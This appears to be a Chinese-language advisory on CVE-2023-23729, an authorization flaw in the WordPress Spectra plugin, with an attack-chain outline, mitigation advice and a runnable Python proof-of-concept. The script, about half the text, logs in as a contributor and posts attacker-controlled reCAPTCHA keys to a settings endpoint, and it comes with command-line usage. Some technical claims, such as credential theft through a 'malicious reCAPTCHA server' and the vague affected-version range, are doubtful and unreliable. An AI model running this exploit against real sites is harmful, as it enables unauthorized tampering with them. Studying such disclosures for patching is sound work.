CVE-2023-23729: WordPress Spectra插件授权缺失漏洞

漏洞信息

漏洞编号

CVE-2023-23729

漏洞类型

授权缺失

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Brainstorm Force Spectra (WordPress Gutenberg Blocks插件)

漏洞概述

CVE-2023-23729是WordPress插件Spectra中的一个授权缺失（Missing Authorization）漏洞。该插件是Brainstorm Force开发的一款流行的古腾堡块编辑器增强插件，提供了多种自定义块和功能。漏洞源于插件对用户权限验证不充分，允许低权限用户（如贡献者角色）修改原本应该仅限管理员操作的reCAPTCHA设置。具体而言，由于访问控制检查机制存在缺陷，攻击者可以利用REST API端点，在未经适当授权的情况下更改站点的reCAPTCHA配置，包括站点密钥和密钥等敏感参数。攻击者可通过修改这些设置，将流量重定向到恶意reCAPTCHA服务，进而窃取用户凭证或进行钓鱼攻击。此漏洞影响Spectra从某个早期版本到2.3.0的所有版本，CVSS评分5.4，属于中等严重程度。

技术细节

该漏洞属于OWASP Top 10中的Broken Access Control（访问控制失效）类别。在Spectra插件中，存在多个REST API端点用于管理插件设置，包括reCAPTCHA配置。问题在于这些端点缺少充分的权限检查。具体来说：1) 端点未正确验证请求用户的角色权限；2) nonce验证可能被绕过或未正确实现；3) capability检查存在逻辑缺陷。攻击者可以构造恶意HTTP请求，指定目标参数（如recaptcha_site_key、recaptcha_secret_key等），通过POST请求到相关API端点。由于插件仅检查用户是否登录，而未验证其是否具有manage_options权限，低权限用户即可成功修改高权限设置。攻击者通常需要先在目标WordPress站点拥有贡献者（Contributor）或更高权限的账户，利用此漏洞可进一步提升攻击效果。

攻击链分析

STEP 1

步骤1

攻击者获取目标WordPress站点的用户账户（贡献者角色或更高权限）

STEP 2

步骤2

攻击者登录WordPress并获取REST API的nonce值

STEP 3

步骤3

攻击者构造恶意请求，向Spectra插件的settings API端点发送修改reCAPTCHA配置的请求

STEP 4

步骤4

由于插件缺少权限验证，请求成功执行，reCAPTCHA设置被恶意修改

STEP 5

步骤5

攻击者将reCAPTCHA服务指向恶意服务器，窃取用户在表单中输入的凭证或敏感信息

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2023-23729 PoC - Spectra Plugin Authorization Bypass
# Target: WordPress site with Spectra plugin < 2.3.0

def exploit_spectra(target_url, username, password):
    """
    Exploit authorization bypass in Spectra plugin
    Allows low-privilege users to modify reCAPTCHA settings
    """
    session = requests.Session()
    
    # Step 1: Login to WordPress
    login_url = f"{target_url}/wp-login.php"
    login_data = {
        'log': username,
        'pwd': password,
        'wp-submit': 'Log In',
        'redirect_to': '/wp-admin/',
        'testcookie': '1'
    }
    
    resp = session.post(login_url, data=login_data, allow_redirects=True)
    
    if 'wordpress_logged_in' not in session.cookies.get_dict():
        print("[-] Login failed")
        return False
    
    print("[+] Login successful")
    
    # Step 2: Get nonce for REST API
    nonce_url = f"{target_url}/wp-admin/admin-ajax.php?action=rest-nonce"
    nonce_resp = session.get(nonce_url)
    nonce = nonce_resp.text.strip()
    
    print(f"[+] Got nonce: {nonce}")
    
    # Step 3: Exploit - Modify reCAPTCHA settings
    exploit_url = f"{target_url}/wp-json/spectra/v1/update_settings"
    
    # Malicious reCAPTCHA settings
    exploit_data = {
        'spectra_reCaptcha_site_key': 'attacker_controlled_key',
        'spectra_reCaptcha_secret_key': 'attacker_secret',
        'spectra_reCaptcha_status': 'true'
    }
    
    headers = {
        'X-WP-Nonce': nonce,
        'Content-Type': 'application/json'
    }
    
    exploit_resp = session.post(exploit_url, json=exploit_data, headers=headers)
    
    if exploit_resp.status_code == 200:
        print("[+] Exploit successful - reCAPTCHA settings modified")
        print(f"[+] Response: {exploit_resp.json()}")
        return True
    else:
        print(f"[-] Exploit failed - Status: {exploit_resp.status_code}")
        return False

if __name__ == "__main__":
    if len(sys.argv) != 4:
        print(f"Usage: python {sys.argv[0]} <target_url> <username> <password>")
        print(f"Example: python {sys.argv[0]} http://target.com contributor password123")
        sys.exit(1)
    
    target = sys.argv[1]
    user = sys.argv[2]
    pwd = sys.argv[3]
    
    exploit_spectra(target, user, pwd)

影响范围

Spectra < 2.3.0

防御指南

临时缓解措施

立即将Spectra插件升级到2.3.0或更高版本。如果无法立即升级，可临时禁用Spectra插件，或通过第三方防火墙规则限制对/wp-json/spectra/v1/*端点的访问，仅允许管理员IP访问。同时，审查所有具有编辑权限的用户账户，移除不必要的账户。